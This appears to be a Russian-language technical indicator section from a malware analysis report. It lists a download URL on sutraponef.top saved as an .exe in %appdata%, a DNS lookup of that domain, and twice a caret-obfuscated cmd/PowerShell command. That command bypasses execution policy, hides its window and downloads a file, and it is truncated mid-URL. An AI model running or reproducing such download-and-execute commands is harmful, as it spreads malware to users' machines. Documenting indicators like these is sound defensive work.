Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Owe^R^shELL.Ex^e^ ^-E^X^e^c^Ut^IONPol^i^Cy bY^pASs ^-nOprO^fil^e^ ^-WInd^O^w^st^YL^E ^HidD^EN (n^EW^-^OB^J^eCt ^sYS^t^em.n^E^t^.^w^EBclI^E^nT).DOwN^lOaD^fi^l^e('http:/...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^Owe^R^shELL.Ex^e^ ^-E^X^e^c^Ut^IONPol^i^Cy bY^pASs ^-nOprO^fil^e^ ^-WInd^O^w^st^YL^E ^HidD^EN (n^EW^-^OB^J^eCt ^sYS^t^em.n^E^t^.^w^EBclI^E^nT).DOwN^lOaD^fi^l^e('http:/...' (со скрытым окном)